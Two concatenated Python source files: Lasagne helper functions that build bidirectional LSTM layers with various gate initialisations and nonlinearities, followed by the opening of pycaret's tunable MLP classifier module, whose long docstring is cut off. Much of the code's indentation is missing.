licenses: ["MIT"] | stars: 7 (2019-07-23T10:20:11Z to 2022-03-14T14:46:13Z) | issues: 10 (2019-09-05T22:45:04Z to 2022-03-21T08:40:49Z) | forks: 5 (2019-07-23T10:20:46Z to 2021-11-14T07:18:05Z)
# -*- coding: utf-8 -*-
import lasagne
def FnB_LSTM(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0.0, cellg=0.0, outg=0., learn_init=False, peepholes=False):
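    # Note: learn_init and peepholes are accepted here and in the variant
    # functions below, but the LSTMLayer calls hard-code both to False, so
    # the arguments currently have no effect.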
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh, # (or linear)
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
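
# Hedged usage sketch (editor's addition, not part of deepclip): how the
# forward/backward pair returned by FnB_LSTM is typically wired into a
# network. The input shapes and hyper-parameters below are illustrative
# assumptions, not values taken from this repository.
def _example_bidirectional_block(seq_len=50, n_features=4):
    l_in_forw = lasagne.layers.InputLayer(shape=(None, seq_len, n_features))
    l_in_backw = lasagne.layers.InputLayer(shape=(None, seq_len, n_features))
    l_forw, l_backw = FnB_LSTM(l_in_forw, l_in_backw, N_LSTM=32,
                               DROPOUT_LSTM=0.5, GRAD_CLIP=100, forget_b=1.0)
    # both layers output (batch, seq_len, N_LSTM); concatenate the two
    # directions along the feature axis
    return lasagne.layers.ConcatLayer([l_forw, l_backw], axis=2)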
def FnB_LSTM_tanh(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.tanh
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.tanh
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
def FnB_LSTM_softplus(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.softplus
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.softplus,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.softplus
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Uniform(),
W_hid=lasagne.init.Uniform(),
W_cell=lasagne.init.Uniform(),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.softplus,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
def FnB_LSTM_softplusN(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.softplus
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.softplus,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.softplus
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.softplus,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
def FnB_LSTM_N(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
def FnB_LSTMsig_N(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.sigmoid,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.sigmoid,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
def FnB_LSTMtan_N(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.tanh
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.tanh
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Normal(0.1),
W_hid=lasagne.init.Normal(0.1),
W_cell=lasagne.init.Normal(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
def FnB_LSTMconst(inp_forw, inp_backw, N_LSTM, DROPOUT_LSTM, GRAD_CLIP, forget_b, ing=0., cellg=0., outg=0., learn_init=False, peepholes=False):
l_forward_1 = lasagne.layers.LSTMLayer(
inp_forw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=lasagne.init.Constant(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=lasagne.init.Constant(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.tanh
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=lasagne.init.Constant(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=False,
learn_init=False,
peepholes=False
)
l_backward_1 = lasagne.layers.LSTMLayer(
inp_backw,
N_LSTM,
ingate=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=lasagne.init.Constant(0.1),
b=lasagne.init.Constant(ing),
nonlinearity=lasagne.nonlinearities.sigmoid
),
forgetgate=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=lasagne.init.Constant(0.1),
b=lasagne.init.Constant(forget_b),
nonlinearity=lasagne.nonlinearities.sigmoid
),
cell=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=None,
b=lasagne.init.Constant(cellg),
nonlinearity=lasagne.nonlinearities.tanh
),
outgate=lasagne.layers.Gate(
W_in=lasagne.init.Constant(0.1),
W_hid=lasagne.init.Constant(0.1),
W_cell=lasagne.init.Constant(0.1),
b=lasagne.init.Constant(outg),
nonlinearity=lasagne.nonlinearities.sigmoid
),
nonlinearity=lasagne.nonlinearities.tanh,
grad_clipping=GRAD_CLIP,
backwards=True,
learn_init=False,
peepholes=False
)
l_fordrop1 = lasagne.layers.DropoutLayer(l_forward_1, p=DROPOUT_LSTM)
l_backdrop1 = lasagne.layers.DropoutLayer(l_backward_1, p=DROPOUT_LSTM)
return l_fordrop1, l_backdrop1
hexsha: bcb2ddaefeedb11317b272826c74ebb4d9351af0 | size: 44,403 bytes | ext: py | lang: Python
path: pycaret/internal/tunable.py | repo: AIIP-DEV/pycaret @ 0e09cd065f5927f120d7c8a9356f95974bfaea01
licenses: ["MIT"] | stars: 1 (2021-04-22T23:39:46.000Z) | issues: n/a | forks: 1 (2021-01-14T07:47:59.000Z)
# Module: internal.tunable
# Author: Antoni Baum (Yard1) <antoni.baum@protonmail.com>
# License: MIT
# Provides a VotingClassifier whose weights can be tuned.
from sklearn.ensemble import VotingClassifier, VotingRegressor
from sklearn.neural_network import MLPClassifier, MLPRegressor
try:
    from collections.abc import Iterable
except ImportError:
    from collections import Iterable
class TunableMLPClassifier(MLPClassifier):
"""
    An MLPClassifier whose hidden layer sizes are passed as kwargs instead of a list/tuple,
    allowing for tuning.
    The kwargs need to be in the format ``hidden_layer_size_n``, where ``n`` is an integer
    corresponding to the index of the layer.
    If the ``hidden_layer_sizes`` parameter is changed with ``set_params()``, the
    ``hidden_layer_size_n`` parameters will change as well, and vice versa.
scikit-learn description below:
Multi-layer Perceptron classifier.
This model optimizes the log-loss function using LBFGS or stochastic
gradient descent.
.. versionadded:: 0.18
Parameters
----------
hidden_layer_sizes : tuple, length = n_layers - 2, default=(100,)
The ith element represents the number of neurons in the ith
hidden layer.
activation : {'identity', 'logistic', 'tanh', 'relu'}, default='relu'
Activation function for the hidden layer.
- 'identity', no-op activation, useful to implement linear bottleneck,
returns f(x) = x
- 'logistic', the logistic sigmoid function,
returns f(x) = 1 / (1 + exp(-x)).
- 'tanh', the hyperbolic tan function,
returns f(x) = tanh(x).
- 'relu', the rectified linear unit function,
returns f(x) = max(0, x)
solver : {'lbfgs', 'sgd', 'adam'}, default='adam'
The solver for weight optimization.
- 'lbfgs' is an optimizer in the family of quasi-Newton methods.
- 'sgd' refers to stochastic gradient descent.
- 'adam' refers to a stochastic gradient-based optimizer proposed
by Kingma, Diederik, and Jimmy Ba
Note: The default solver 'adam' works pretty well on relatively
large datasets (with thousands of training samples or more) in terms of
both training time and validation score.
For small datasets, however, 'lbfgs' can converge faster and perform
better.
alpha : float, default=0.0001
L2 penalty (regularization term) parameter.
batch_size : int, default='auto'
Size of minibatches for stochastic optimizers.
If the solver is 'lbfgs', the classifier will not use minibatch.
When set to "auto", `batch_size=min(200, n_samples)`
learning_rate : {'constant', 'invscaling', 'adaptive'}, default='constant'
Learning rate schedule for weight updates.
- 'constant' is a constant learning rate given by
'learning_rate_init'.
- 'invscaling' gradually decreases the learning rate at each
time step 't' using an inverse scaling exponent of 'power_t'.
effective_learning_rate = learning_rate_init / pow(t, power_t)
- 'adaptive' keeps the learning rate constant to
'learning_rate_init' as long as training loss keeps decreasing.
Each time two consecutive epochs fail to decrease training loss by at
least tol, or fail to increase validation score by at least tol if
'early_stopping' is on, the current learning rate is divided by 5.
Only used when ``solver='sgd'``.
learning_rate_init : double, default=0.001
The initial learning rate used. It controls the step-size
in updating the weights. Only used when solver='sgd' or 'adam'.
power_t : double, default=0.5
The exponent for inverse scaling learning rate.
It is used in updating effective learning rate when the learning_rate
is set to 'invscaling'. Only used when solver='sgd'.
max_iter : int, default=200
Maximum number of iterations. The solver iterates until convergence
(determined by 'tol') or this number of iterations. For stochastic
solvers ('sgd', 'adam'), note that this determines the number of epochs
(how many times each data point will be used), not the number of
gradient steps.
shuffle : bool, default=True
Whether to shuffle samples in each iteration. Only used when
solver='sgd' or 'adam'.
random_state : int, RandomState instance, default=None
Determines random number generation for weights and bias
initialization, train-test split if early stopping is used, and batch
sampling when solver='sgd' or 'adam'.
Pass an int for reproducible results across multiple function calls.
See :term:`Glossary <random_state>`.
tol : float, default=1e-4
Tolerance for the optimization. When the loss or score is not improving
by at least ``tol`` for ``n_iter_no_change`` consecutive iterations,
unless ``learning_rate`` is set to 'adaptive', convergence is
considered to be reached and training stops.
verbose : bool, default=False
Whether to print progress messages to stdout.
warm_start : bool, default=False
When set to True, reuse the solution of the previous
call to fit as initialization, otherwise, just erase the
previous solution. See :term:`the Glossary <warm_start>`.
momentum : float, default=0.9
Momentum for gradient descent update. Should be between 0 and 1. Only
used when solver='sgd'.
nesterovs_momentum : boolean, default=True
Whether to use Nesterov's momentum. Only used when solver='sgd' and
momentum > 0.
early_stopping : bool, default=False
Whether to use early stopping to terminate training when validation
score is not improving. If set to true, it will automatically set
aside 10% of training data as validation and terminate training when
validation score is not improving by at least tol for
``n_iter_no_change`` consecutive epochs. The split is stratified,
except in a multilabel setting.
Only effective when solver='sgd' or 'adam'
validation_fraction : float, default=0.1
The proportion of training data to set aside as validation set for
early stopping. Must be between 0 and 1.
Only used if early_stopping is True
beta_1 : float, default=0.9
Exponential decay rate for estimates of first moment vector in adam,
should be in [0, 1). Only used when solver='adam'
beta_2 : float, default=0.999
Exponential decay rate for estimates of second moment vector in adam,
should be in [0, 1). Only used when solver='adam'
epsilon : float, default=1e-8
Value for numerical stability in adam. Only used when solver='adam'
n_iter_no_change : int, default=10
Maximum number of epochs to not meet ``tol`` improvement.
Only effective when solver='sgd' or 'adam'
.. versionadded:: 0.20
max_fun : int, default=15000
Only used when solver='lbfgs'. Maximum number of loss function calls.
The solver iterates until convergence (determined by 'tol'), number
of iterations reaches max_iter, or this number of loss function calls.
Note that number of loss function calls will be greater than or equal
to the number of iterations for the `MLPClassifier`.
.. versionadded:: 0.22
**kwargs:
Hidden layer sizes in format ``hidden_layer_size_n`` where ``n``
is an integer corresponding to the index of the estimator.
        If the value is less than or equal to zero, the hidden layer will be removed.
Will overwrite ``hidden_layer_sizes``.
Attributes
----------
classes_ : ndarray or list of ndarray of shape (n_classes,)
Class labels for each output.
loss_ : float
The current loss computed with the loss function.
coefs_ : list, length n_layers - 1
The ith element in the list represents the weight matrix corresponding
to layer i.
intercepts_ : list, length n_layers - 1
The ith element in the list represents the bias vector corresponding to
layer i + 1.
    n_iter_ : int
        The number of iterations the solver has run.
n_layers_ : int
Number of layers.
n_outputs_ : int
Number of outputs.
out_activation_ : string
Name of the output activation function.
Examples
--------
>>> from sklearn.neural_network import MLPClassifier
>>> from sklearn.datasets import make_classification
>>> from sklearn.model_selection import train_test_split
>>> X, y = make_classification(n_samples=100, random_state=1)
>>> X_train, X_test, y_train, y_test = train_test_split(X, y, stratify=y,
... random_state=1)
>>> clf = MLPClassifier(random_state=1, max_iter=300).fit(X_train, y_train)
>>> clf.predict_proba(X_test[:1])
array([[0.038..., 0.961...]])
>>> clf.predict(X_test[:5, :])
array([1, 0, 1, 0, 1])
>>> clf.score(X_test, y_test)
0.8...
Notes
-----
MLPClassifier trains iteratively since at each time step
the partial derivatives of the loss function with respect to the model
parameters are computed to update the parameters.
It can also have a regularization term added to the loss function
that shrinks model parameters to prevent overfitting.
This implementation works with data represented as dense numpy arrays or
sparse scipy arrays of floating point values.
References
----------
Hinton, Geoffrey E.
"Connectionist learning procedures." Artificial intelligence 40.1
(1989): 185-234.
